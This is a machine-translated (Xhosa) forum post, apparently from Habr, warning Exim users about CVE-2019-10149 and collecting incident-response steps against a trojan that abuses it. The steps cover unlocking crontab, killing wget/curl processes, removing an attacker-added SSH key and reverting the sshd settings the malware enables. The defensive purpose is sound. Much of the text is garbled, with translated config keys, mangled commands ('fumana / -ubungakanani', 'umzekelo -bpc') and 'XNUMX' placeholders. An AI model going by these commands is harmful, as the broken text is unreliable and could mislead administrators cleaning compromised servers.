Abalingane abasebenzisa iinguqulelo ze-Exim 4.87...4.91 kwiiseva zabo zeposi - ukuhlaziya ngokukhawuleza kwinguqulo ye-4.92, beqale bamisa i-Exim ngokwayo ukuze baphephe ukugqekeza nge-CVE-2019-10149.
Izigidi ezininzi zeeseva emhlabeni jikelele zinokuba semngciphekweni, ubuthathaka bulinganiswe njengento ebalulekileyo (i-CVSS 3.0 base score = 9.8/10). Abahlaseli banokusebenzisa imiyalelo engafanelekanga kumncedisi wakho, kwiimeko ezininzi ukusuka kwingcambu.
Nceda uqinisekise ukuba usebenzisa uguqulelo olusisigxina (4.92) okanye esele ilungisiwe.
Okanye cima esele ikhona, bona intambo .
Uhlaziyo lwe iisenti 6: i-cm. - kwi-centos 7 iyasebenza, ukuba ayifikanga ngqo kwi-epel okwangoku.
UPD: Ubuntu buchaphazelekile 18.04 kunye ne18.10, uhlaziyo lukhutshelwe bona. Iinguqulelo ze-16.04 kunye ne-19.04 azichaphazeleki ngaphandle kokuba iinketho eziqhelekileyo zifakwe kuzo. Iinkcukacha ezingakumbi .
Ngoku ingxaki echazwe apho ixhatshazwa ngokusebenzayo (yi-bot, mhlawumbi), ndiqaphele usulelo kwezinye iiseva (ezisebenza kwi-4.91).
Ukuqhubela phambili kokufunda kufanelekileyo kuphela kwabo sele "beyifumene" - kufuneka uhambise yonke into kwi-VPS ecocekileyo kunye nesofthiwe entsha, okanye ukhangele isisombululo. Ngaba siza kuzama? Bhala ukuba nabani na onokoyisa le malware.
Ukuba wena, ungumsebenzisi we-Exim kwaye ufunda le nto, awukahlaziywa (awuqinisekanga ukuba i-4.92 okanye inguqulelo ephekiweyo iyafumaneka), nceda ume kwaye ubaleke ukuhlaziya.
Kwabo sele befikile, masiqhubeke...
IUPS: kwaye inika iingcebiso ezifanelekileyo:
Kunokubakho iintlobo ezininzi ze-malware. Ngokusungula iyeza lento engalunganga kunye nokucoca umgca, umsebenzisi akayi kunyangwa kwaye angazi ukuba kufuneka anyangwe ngantoni.
Usulelo luphawuleka ngolu hlobo: [kthrotlds] ilayisha iprosesa; kwi-VDS ebuthathaka yi-100%, kwiiseva ibuthathaka kodwa iyabonakala.
Emva kokusuleleka, i-malware isusa ukungena kwe-cron, ibhalise ngokwayo khona ukuze iqhube yonke imizuzu ye-4, ngelixa yenza ifayile ye-crontab ingaguquki. Crontab -e ayikwazi ukugcina utshintsho, inika imposiso.
Okungaguqukiyo kunokususwa, umzekelo, ngolu hlobo, kwaye emva koko ucime umgca womyalelo (1.5kb):
chattr -i /var/spool/cron/root
crontab -e
Okulandelayo, kumhleli we-crontab (vim), cima umgca kwaye ugcine:dd
:wq
Nangona kunjalo, ezinye iinkqubo ezisebenzayo zibhala ngaphezulu kwakhona, ndiyayicinga.
Kwangaxeshanye, kukho iqela lee-wget ezisebenzayo (okanye ii-curls) ezixhonywe kwiidilesi ezisuka kwiskripthi sofakelo (jonga ngezantsi), ndibawisa ngolu hlobo okwangoku, kodwa baqala kwakhona:
ps aux | grep wge[t]
ps aux | grep cur[l]
echo "Stopping..."
kill -9 `ps aux | grep wge[t] | awk '{print $2}'`
kill -9 `ps aux | grep cur[l] | awk '{print $2}'`
Ndifumene iskripthi se-installer yeTrojan apha (centos): /usr/local/bin/nptd... Andiyithumeli ukuyiphepha, kodwa ukuba kukho umntu osulelekileyo kwaye uyaziqonda izikripthi zegobolondo, nceda ufunde ngokucophelela.
Ndiza kongeza njengoko ulwazi luhlaziywa.
UPD 1: Ukucima iifayile (nge-preliminary chattr -i) /etc/cron.d/root, /etc/crontab, rm -Rf /var/spool/cron/root ayizange incede, kwaye ayizange imise inkonzo-kwafuneka ndiyenze. crontab ngokupheleleyo okwangoku yikrazule (yitha ngokutsha ifayile yomgqomo).
UPD 2: Isifakeli seTrojan ngamanye amaxesha sasilele kwezinye iindawo, ukukhangela ngokobungakanani kunceda:
fumana / -ubungakanani 19825c
UPD 3/XNUMX/XNUMX: Nceda nceda! Ukongeza kokukhubaza iselinux, iTrojan yongeza eyakhe Iqhosha le-SSH nge ${sshdir}/authorized_keys! Kwaye isebenze le mihlaba ilandelayo kwi /etc/ssh/sshd_config, ukuba ayikamiselwa ukuba EWE:
ImvumeRootLogin ewe
RSAAUqinisekiso ewe
Ubungqina be-Pubkey ewe
echo UsePAM ewe
PasswordAuthentication ewe
UPD 4: Ukushwankathela okwangoku: khubaza i-Exim, cron (eneengcambu), ngokukhawuleza susa isitshixo seTrojan kwi-ssh kwaye uhlele i-sshd config, qala kwakhona i-sshd! Kwaye akukacaci ukuba oku kuya kunceda, kodwa ngaphandle kwayo kukho ingxaki.
Ndahambisa ulwazi olubalulekileyo kwiinkcazo malunga neepatches / ukuhlaziywa ukuya ekuqaleni kwenqaku, ukuze abafundi baqale ngayo.
UPD 5/XNUMX/XNUMX: ukuba i-malware itshintshe iiphasiwedi kwi-WordPress.
UPD 6/XNUMX/XNUMX: , masivavanye! Emva kokuqalisa ngokutsha okanye ukuvala, iyeza libonakala ngathi liyanyamalala, kodwa okwangoku lilo eli.
Nabani na owenza (okanye ufumana) isisombululo esizinzile, nceda ubhale, uya kunceda abaninzi.
UPD 7/XNUMX/XNUMX: uyabhala:
Ukuba awukathethi ukuba intsholongwane ivuswa ngokubulela kwileta engathunyelwanga kwi-Exim, xa uzama ukuthumela ileta kwakhona, ibuyiselwe, jonga kwi / var / spool / exim4
Ungawucima wonke umgca we-Exim ngolu hlobo:
exipick -i | xargs exim -Mnu
Ukujonga inani lamangeno emgceni:
umzekelo -bpc
UPD 8: Kwakhona : I-FirstVDS yanikela ngoguqulelo lwabo lweskripthi sonyango, masiyivavanye!
UPD 9: Kubonakala ngathi u sebenza, Enkosi yeskripthi!
Into ephambili kukuba ungalibali ukuba umncedisi wayesele ephazamisekile kwaye abahlaseli babekwazi ukutshala ezinye izinto ezimbi ezingabonakaliyo (ezingadweliswanga kwi-dropper).
Ngoko ke, kungcono ukufudukela kwi-server efakwe ngokupheleleyo (vds), okanye ubuncinci ukuqhubeka nokubeka iliso isihloko - ukuba kukho into entsha, bhala kwiinkcazo apha, kuba ngokucacileyo ayinguye wonke umntu oza kuya kufakelo olutsha...
UPD 10: Enkosi kwakhona : ikhumbuza ukuba kungekhona kuphela abancedisi abosulelekileyo, kodwa kwakhona Raspberry Pi, kunye nazo zonke iintlobo zemishini ebonakalayo ... Ngoko emva kokugcina amaseva, ungalibali ukugcina iividiyo zakho zevidiyo, iirobhothi, njl.
UPD 11: Ukusuka Inqaku elibalulekileyo labanyanga ngesandla:
(emva kokusebenzisa enye okanye enye indlela yokulwa le malware)
Ngokuqinisekileyo kufuneka uqalise kwakhona - i-malware ihlala kwenye indawo kwiinkqubo ezivulekileyo kwaye, ngokufanelekileyo, kwimemori, kwaye izibhale entsha ukuze icron rhoqo kwimizuzwana engama-30.
UPD 12/XNUMX/XNUMX: I-Exim inenye (?) i-malware emgceni wayo kwaye icebisa ukuba uqale ufunde ingxaki yakho ngaphambi kokuba uqalise unyango.
UPD 13/XNUMX/XNUMX: kunokuba, hambisa inkqubo ecocekileyo, kwaye uthumele iifayile ngocoselelo kakhulu, kuba I-malware sele ifumaneka esidlangalaleni kwaye inokusetyenziswa ngezinye iindlela, ezingacacanga kwaye ziyingozi ngakumbi.
I-UPD 14: ukuziqinisekisa ukuba abantu abalumkileyo ababaleki kwiingcambu - enye into :
Nokuba ayisebenzi ukusuka kwingcambu, i-hacking iyenzeka ... Ndine-debian jessie UPD: yolula kwi-OrangePi yam, i-Exim iqhuba i-Debian-exim kwaye isaqhubeka i-hacking, izithsaba ezilahlekileyo, njl.
I-UPD 15: xa ufudukela kwiseva ecocekileyo ukusuka kwindawo ephazamisekileyo, ungalibali malunga nococeko, :
Xa udlulisela idatha, nikela ingqalelo kungekuphela nje kwiifayile eziphunyeziweyo okanye zoqwalaselo, kodwa nayo nayiphi na into enokuthi iqulethe imiyalelo engalunganga (umzekelo, kwi-MySQL le nto ingaba CREATE TRIGGER okanye CREATE EVENT). Kwakhona, ungalibali malunga ne-.html, .js, .php, .py kunye nezinye iifayile zoluntu (ngokufanelekileyo ezi fayile, njengenye idatha, kufuneka zibuyiselwe kwindawo okanye kwenye indawo yokugcina ethembekileyo).
UPD 16/XNUMX/XNUMX: ΠΈ : inkqubo yayinoguqulelo olunye lwe Exim efakiweyo kumazibuko, kodwa eneneni ibiqhuba enye.
Ngoko wonke umntu emva kohlaziyo kufuneka uqinisekise ukuba usebenzisa inguqulelo entsha!
exim --versionSayilungisa kunye imeko yabo ekhethekileyo.
Umncedisi usebenzise i-DirectAdmin kunye nephakheji yayo endala ye-da_exim (uguqulelo oludala, ngaphandle kokuba sesichengeni).
Kwangaxeshanye, ngoncedo lomphathi wephakeji ye-DirectAdmin, enyanisweni, inguqulelo entsha ye-Exim yafakwa, eyayisele isesichengeni.
Kule meko, ukuhlaziywa nge-custombuild nako kuncede.
Ungalibali ukwenza ii-backups phambi kovavanyo olunjalo, kwaye uqinisekise ukuba ngaphambi/emva kohlaziyo zonke iinkqubo ze-Exim zezoguqulelo oludala. kwaye "ungabambekanga" kwinkumbulo.
umthombo: www.habr.com